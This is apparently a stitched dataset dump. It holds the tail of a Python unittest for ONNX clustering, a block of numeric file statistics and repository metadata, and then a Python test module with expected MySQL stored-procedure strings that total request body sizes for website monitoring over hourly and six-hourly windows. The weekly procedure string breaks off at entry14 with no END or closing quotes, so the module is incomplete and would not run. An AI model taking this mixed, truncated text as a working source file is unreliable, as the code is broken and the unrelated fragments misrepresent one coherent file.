        self.assertEqualArray(expected_label, got['label'])
if __name__ == '__main__':
    # Allow running this test file directly, outside the full test suite.
    # TestOnnxSpeedupCluster().test_speedup_kmeans32()
    unittest.main()
| 34.336283
| 67
| 0.635438
| 912
| 7,760
| 5.220395
| 0.120614
| 0.010922
| 0.082336
| 0.043688
| 0.829658
| 0.820416
| 0.819366
| 0.768536
| 0.752363
| 0.752363
| 0
| 0.015036
| 0.254381
| 7,760
| 225
| 68
| 34.488889
| 0.807812
| 0.023454
| 0
| 0.755208
| 0
| 0
| 0.016125
| 0
| 0
| 0
| 0
| 0
| 0.109375
| 1
| 0.078125
| false
| 0
| 0.072917
| 0.005208
| 0.161458
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41428dcf6d1fb25a21a121c3fb4919bb9d19def5
| 46,614
|
py
|
Python
|
mysql_config/WebMonitoring/generators/website/tests/website_expected_size.py
|
raresraf/rafMetrics
|
21eb5e8210364bf70eee746d71c45f3e353dcb10
|
[
"MIT"
] | 15
|
2019-11-03T18:01:27.000Z
|
2021-05-05T20:54:57.000Z
|
mysql_config/WebMonitoring/generators/website/tests/website_expected_size.py
|
raresraf/rafMetrics
|
21eb5e8210364bf70eee746d71c45f3e353dcb10
|
[
"MIT"
] | 392
|
2019-11-09T21:28:01.000Z
|
2022-03-31T13:04:45.000Z
|
mysql_config/WebMonitoring/generators/website/tests/website_expected_size.py
|
raresraf/rafMetrics
|
21eb5e8210364bf70eee746d71c45f3e353dcb10
|
[
"MIT"
] | 1
|
2021-03-11T18:35:16.000Z
|
2021-03-11T18:35:16.000Z
|
# Golden/expected SQL for the daily "size" sample generator (websites).
# (Re)creates the MySQL stored procedure `get_daily_samples_size_websites`,
# which fills 24 OUT parameters (entry0..entry23) with SUM(bodySize) over the
# REQUESTS rows tied to one WEBSITES_METRICS sample per 1-hour window covering
# the last 24 hours for website `id`; `start_hour` receives HOUR(NOW()).
# Windows with no matching sample are set to 0.
# NOTE(review): each window selects a single metric row via `limit 1` with no
# ORDER BY, so which sample is summed is engine-dependent — confirm intended.
# This is a byte-exact expected value for a test; do not reformat the string.
EXPECTED_DAILY_WEBSITE_GENERATE_SAMPLES_QUERIES_SIZE: str = """delimiter //
DROP PROCEDURE IF EXISTS get_daily_samples_size_websites;
CREATE PROCEDURE get_daily_samples_size_websites (
IN id INT,
OUT entry0 FLOAT,
OUT entry1 FLOAT,
OUT entry2 FLOAT,
OUT entry3 FLOAT,
OUT entry4 FLOAT,
OUT entry5 FLOAT,
OUT entry6 FLOAT,
OUT entry7 FLOAT,
OUT entry8 FLOAT,
OUT entry9 FLOAT,
OUT entry10 FLOAT,
OUT entry11 FLOAT,
OUT entry12 FLOAT,
OUT entry13 FLOAT,
OUT entry14 FLOAT,
OUT entry15 FLOAT,
OUT entry16 FLOAT,
OUT entry17 FLOAT,
OUT entry18 FLOAT,
OUT entry19 FLOAT,
OUT entry20 FLOAT,
OUT entry21 FLOAT,
OUT entry22 FLOAT,
OUT entry23 FLOAT,
OUT start_hour FLOAT
)
BEGIN
select HOUR(now()) INTO start_hour;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 24 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 23 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry0 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 24 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 23 HOUR) AND Websiteid = id limit 1);
else SET entry0 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 23 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 22 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry1 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 23 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 22 HOUR) AND Websiteid = id limit 1);
else SET entry1 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 22 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 21 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry2 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 22 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 21 HOUR) AND Websiteid = id limit 1);
else SET entry2 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 21 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 20 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry3 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 21 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 20 HOUR) AND Websiteid = id limit 1);
else SET entry3 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 20 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 19 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry4 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 20 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 19 HOUR) AND Websiteid = id limit 1);
else SET entry4 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 19 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry5 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 19 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND Websiteid = id limit 1);
else SET entry5 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 17 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry6 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 17 HOUR) AND Websiteid = id limit 1);
else SET entry6 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 17 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 16 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry7 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 17 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 16 HOUR) AND Websiteid = id limit 1);
else SET entry7 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 16 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 15 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry8 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 16 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 15 HOUR) AND Websiteid = id limit 1);
else SET entry8 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 15 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 14 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry9 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 15 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 14 HOUR) AND Websiteid = id limit 1);
else SET entry9 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 14 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 13 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry10 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 14 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 13 HOUR) AND Websiteid = id limit 1);
else SET entry10 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 13 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry11 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 13 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND Websiteid = id limit 1);
else SET entry11 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 11 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry12 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 11 HOUR) AND Websiteid = id limit 1);
else SET entry12 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 11 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 10 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry13 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 11 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 10 HOUR) AND Websiteid = id limit 1);
else SET entry13 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 10 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 9 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry14 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 10 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 9 HOUR) AND Websiteid = id limit 1);
else SET entry14 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 9 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 8 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry15 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 9 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 8 HOUR) AND Websiteid = id limit 1);
else SET entry15 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 8 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 7 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry16 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 8 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 7 HOUR) AND Websiteid = id limit 1);
else SET entry16 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 7 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry17 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 7 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND Websiteid = id limit 1);
else SET entry17 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 5 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry18 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 5 HOUR) AND Websiteid = id limit 1);
else SET entry18 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 5 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 4 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry19 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 5 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 4 HOUR) AND Websiteid = id limit 1);
else SET entry19 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 4 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 3 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry20 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 4 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 3 HOUR) AND Websiteid = id limit 1);
else SET entry20 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 3 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 2 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry21 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 3 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 2 HOUR) AND Websiteid = id limit 1);
else SET entry21 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 2 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 1 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry22 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 2 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 1 HOUR) AND Websiteid = id limit 1);
else SET entry22 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 1 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 0 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry23 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 1 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 0 HOUR) AND Websiteid = id limit 1);
else SET entry23 := 0;
end if;
END//
delimiter ;
"""
# Golden/expected SQL for the weekly "size" sample generator (websites).
# (Re)creates the MySQL stored procedure `get_weekly_samples_size_websites`,
# which fills 28 OUT parameters (entry0..entry27) with SUM(bodySize) over the
# REQUESTS rows tied to one WEBSITES_METRICS sample per 6-hour window covering
# the last 168 hours (7 days) for website `id`; `start_hour` receives
# HOUR(NOW()).  Windows with no matching sample are set to 0.
# NOTE(review): as in the daily variant, each window selects a single metric
# row via `limit 1` with no ORDER BY — result row is engine-dependent.
# This is a byte-exact expected value for a test; do not reformat the string.
EXPECTED_WEEKLY_WEBSITE_GENERATE_SAMPLES_QUERIES_SIZE: str = """delimiter //
DROP PROCEDURE IF EXISTS get_weekly_samples_size_websites;
CREATE PROCEDURE get_weekly_samples_size_websites (
IN id INT,
OUT entry0 FLOAT,
OUT entry1 FLOAT,
OUT entry2 FLOAT,
OUT entry3 FLOAT,
OUT entry4 FLOAT,
OUT entry5 FLOAT,
OUT entry6 FLOAT,
OUT entry7 FLOAT,
OUT entry8 FLOAT,
OUT entry9 FLOAT,
OUT entry10 FLOAT,
OUT entry11 FLOAT,
OUT entry12 FLOAT,
OUT entry13 FLOAT,
OUT entry14 FLOAT,
OUT entry15 FLOAT,
OUT entry16 FLOAT,
OUT entry17 FLOAT,
OUT entry18 FLOAT,
OUT entry19 FLOAT,
OUT entry20 FLOAT,
OUT entry21 FLOAT,
OUT entry22 FLOAT,
OUT entry23 FLOAT,
OUT entry24 FLOAT,
OUT entry25 FLOAT,
OUT entry26 FLOAT,
OUT entry27 FLOAT,
OUT start_hour FLOAT
)
BEGIN
select HOUR(now()) INTO start_hour;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 168 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 162 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry0 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 168 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 162 HOUR) AND Websiteid = id limit 1);
else SET entry0 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 162 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 156 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry1 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 162 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 156 HOUR) AND Websiteid = id limit 1);
else SET entry1 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 156 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 150 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry2 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 156 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 150 HOUR) AND Websiteid = id limit 1);
else SET entry2 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 150 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 144 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry3 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 150 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 144 HOUR) AND Websiteid = id limit 1);
else SET entry3 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 144 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 138 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry4 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 144 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 138 HOUR) AND Websiteid = id limit 1);
else SET entry4 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 138 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 132 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry5 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 138 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 132 HOUR) AND Websiteid = id limit 1);
else SET entry5 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 132 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 126 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry6 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 132 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 126 HOUR) AND Websiteid = id limit 1);
else SET entry6 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 126 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 120 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry7 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 126 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 120 HOUR) AND Websiteid = id limit 1);
else SET entry7 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 120 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 114 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry8 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 120 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 114 HOUR) AND Websiteid = id limit 1);
else SET entry8 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 114 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 108 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry9 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 114 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 108 HOUR) AND Websiteid = id limit 1);
else SET entry9 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 108 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 102 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry10 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 108 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 102 HOUR) AND Websiteid = id limit 1);
else SET entry10 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 102 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 96 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry11 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 102 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 96 HOUR) AND Websiteid = id limit 1);
else SET entry11 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 96 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 90 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry12 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 96 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 90 HOUR) AND Websiteid = id limit 1);
else SET entry12 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 90 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 84 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry13 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 90 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 84 HOUR) AND Websiteid = id limit 1);
else SET entry13 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 84 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 78 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry14 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 84 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 78 HOUR) AND Websiteid = id limit 1);
else SET entry14 := 0;
end if;
